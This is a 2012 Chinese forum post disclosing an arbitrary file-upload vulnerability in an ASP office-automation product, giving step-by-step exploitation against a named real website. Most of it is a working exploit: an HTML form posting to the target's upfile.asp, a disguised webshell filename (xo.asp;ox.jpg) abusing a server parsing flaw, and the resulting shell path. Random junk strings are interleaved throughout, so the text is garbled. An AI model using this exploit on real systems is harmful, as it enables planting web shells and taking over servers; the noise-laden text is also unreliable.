全能OA办公系统 上传漏洞
# F; o& v& h0 @+ f3 i( t- M4 z( N7 m U( {' d$ O" z# ^
系统介绍:
: d& y Q$ [/ l, ~" @
0 h; M! Z* @0 U" c9 O' J全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。) _' }# K7 T1 m7 x7 C
6 p$ Q \ j: j! t a z主要功能:& e3 V' v/ S& s3 [6 A. v
公司通告
0 ~2 R0 r% H$ l0 R- y工作计划 3 v7 c& a0 U' x7 I V8 c9 y
通讯助理 9 e8 G) X3 J" o' r2 m& Q
客户资源
4 X q* v* C1 h! B4 R我的公文
& K* t A" ]5 S! S: |公文传阅
6 u. e) l& q3 ?公共资源 ' A, f# `9 N7 C1 a
资源预约
. y7 k" m* ]. M- x1 l* \- A$ g今日考勤 * L6 g3 } H% o# O9 [% U
个人计划 0 B! S2 K1 l# j& R6 ]% W" K
个人通讯录
1 b% }7 c f1 H& s- G8 z% {( M0 S个人基本档案
: s2 A# x$ g- ]# E1 ^未读邮件 / Q7 N* O( y, v J
发邮件 1 p( A* N) ?' ~3 R* r3 h
收件夹 % Q- ~: I, @3 Z4 T
寄件夹
8 i$ j; ? L: |4 g网络硬盘
; x: w1 v* I, j+ [% i$ l% t3 N! ^5 I网络会议
" l$ i' `- d2 H' C8 w网络调查
0 \1 @1 R, e! e交流论坛
5 h+ H) ^% C5 s$ W9 _; k1 d" F2 L
有兴趣测试的朋友可以下源码看看: ?2 }: Y5 p. b8 y8 |
: g% e5 P/ @! ]+ |源码下载:
6 l$ n& o: P/ |, q; I3 }8 ]- h n4 o
http://www.mycodes.net/30/4750.htm/ }2 S ^! h7 t! ^ ~' U, R( t; w
8 x3 Q" L& p; j漏洞介绍:& ~+ ?4 y9 y& o* X
( L9 I4 @9 b$ @由upfile.asp上传文件漏洞引起2 B- [' r$ Y/ i7 R+ _) b: s
& M8 [2 n& R5 s$ |测试方法:
: J; } {+ f7 t% ^2 V/ f, \: x6 c \
使用名小子上传http://www.itlynn.com/upfile.asp即可; x3 C) o; t1 \$ f, T2 ^& y* E
) e2 E6 N+ _& J+ N; p; F8 G- c9 Y如果upfile.asp文件被删除不存在。6 T# `( e F+ i- C, C
! d5 P! {/ ~' s2 \& \
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
% t8 H4 i# @2 z( m8 Y6 J% Q. c- n$ ?1 k' Y2 s+ h- \
如果存在那么将如下代码保存为upfile.html。
; |1 X! Q3 V2 i2 E3 |" F6 g0 f" G& K# Q$ P. [
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
6 n% ^2 K$ h) Y" y# p* T% I. l: e$ t2 Z% T8 i4 b( E4 c
; C3 S! C2 L [6 ~9 A: u5 J. K2 h% @6 k& u$ Q) ~ S. W2 `
01 <table border='0' align="center" cellpadding="5"> 0 ~/ w( r. _! h1 ]- r
/ w5 X9 V0 V+ y& d/ O! m0 ?; I( v02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
1 P' c1 @( W5 Q0 { F' P: k3 }! R; _9 [0 ?& L+ f, `* R
03 <tr>
1 E$ J" l+ F" E& z$ g6 d0 z% |" v9 `2 N' }+ q
04 <td>报错:</td>
/ j4 c! _! _0 e& K, [* ` y$ S" \$ l4 e* |8 `' K6 k& E
05 <td><input type='radio' name='errnumber' value='0'>
1 g# }; g5 M. Q
* w2 _$ n! [& ?( O06 自动更名 : j1 @* I! e3 r) E- c7 W
! u- d& z5 O6 J" I" k: J07 <input type='radio' name='errnumber' value='1' checked> ; J* g# N* V' x- D) i
, t3 i9 E0 |0 t; d
08 报错方式
' M8 n4 o# v4 x1 }; X' ~) o
, ~/ r$ e }. L1 h2 a09 <input type='radio' name='errnumber' value='2'> ' Z$ w( X. H; [
4 ^6 z4 t6 E2 ^10 直接覆盖</td>
- L+ l" p0 `0 ]. f# D- J! W+ o6 ?, a1 B7 c* P% C
11 </tr>
' j! [0 e. q# n: i# i% d
+ @4 Q7 S: D% _" l; L12 <tr>
0 ^1 m3 V) X7 k6 t( S3 D8 F. |7 D$ `7 Z& x0 Y2 _+ u9 i
13 <td>主题:</td>
+ C: C3 p% Q- l0 w9 i1 D Q& v( Q
6 p* m2 A: [( v! |( M2 g7 l9 P9 H14 <td><input type='text' name='filename' size='30'></td>
) _+ p8 B+ p# M% e; v6 E& a
: I1 v! j( S; P15 </tr> 9 T# A8 d# ~0 U7 c
2 C& \7 q4 G: a, a- F16 <tr> : H: C* t2 R6 X4 c+ ?6 V
. m+ b4 d- ^" o9 |3 T17 <td>文件:</td> / |& v' V4 Z: M8 f8 Q& z# u
7 r( k) Y: x3 |0 p18 <td><input type="file"name="fruit"size="30"></td>
! q, Q$ \7 ]+ V/ d8 i: C7 _0 R8 M$ t( i2 x! a* S4 }
19 </tr> + U3 K" J1 S- W( e( H
; `1 x: q6 E+ @' Y6 u+ m
20 <tr>
' H. W: b b( V, n) g) E
s1 b' _/ t0 i' c21 <td valign='top'>简介:</td>
" R9 x; P0 y& Z& N1 `! c, X" w6 u% \; F) p' D9 n6 \
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
5 u% I& l( w' o8 X9 D/ h @- E; `( ` H; y9 I/ [
23 </tr>
' N; z, o L" F
5 J7 C" J. t5 |3 o24
) O' X, n& F% r. M, H. m: y0 D) N9 t
' r+ ^' a0 ?7 o, m) T25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
& `, \, {; V9 |8 {4 I4 g3 x, u7 V/ w# K6 _2 r7 M! G
26 </tr> 3 M% l; Y6 K% z
l5 U% w6 D9 z5 }9 B( w
27 </form>
- g- k2 A) W2 k" P& t( X5 H
0 k2 A/ J* \1 E1 @( P# ?; Q然后打开上传一个文件名为xo.asp;ox.jpg的文件。, z$ V; `( F; ~$ W |
' u- f {6 M& N3 i3 h' [
v4 A. V; u0 F7 d Q4 }; y
* m# L3 x" i: X; ^3 A( l: U5 p& [上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
( W! q8 V; ~3 ~9 ?" v# ]* n& f2 {
6 i6 C* i5 y4 C$ s/ _) |% y此漏洞需要配合解析漏洞利用。8 @) j" ]9 `- g1 c9 W
& Y" A* G" E- ]9 L8 M
|
发表于 2012-11-21 13:45:12
收藏
支持
反对